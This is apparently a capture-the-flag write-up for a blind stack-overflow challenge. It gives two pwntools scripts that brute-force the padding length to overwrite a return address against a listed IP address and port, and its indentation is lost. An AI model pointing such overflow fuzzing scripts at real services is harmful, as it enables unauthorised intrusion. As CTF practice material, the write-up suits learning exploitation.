Title description
This kind of question is very interesting, only the title scene address is given without files, so you can blindly type, similar to the blind note in the web;
nc connection, give the target address, 思路是:
use the stack overflow to cover, return to this address; the specific overflow is uncertain, whether it is P64() or P32() is also uncertain; write an EXP and try it gradually
from pwn import *
b = 0x40060d
for i in range(100):
print(i)
p = remote('111.200.241.244',49684)
payload='a'*i+p64(b)
p.recvuntil(">")
p.sendline(payload)
p.interactive()
Get the flag, if P64() does not get the answer, change to P32 and try again; you can also set an appropriate value range to reduce the time;
You can also refer to another kind of EXP that is a little more complicated than mine, but the operation is only one step:
from pwn import *
b = 0x40060d
def fuzz(p, i, j):
payload = 'a' * i
if j==1:
payload += p32(b)
if j==2:
payload += p64(b)
p.recvuntil(">")
p.sendline(payload)
def main():
for i in range(100):
print(i)
for j in range(1, 3):
try:
p = remote('111.200.241.244',45566)
fuzz(p, i, j)
print p.recv()
p.interactive()
except:
p.close()
main()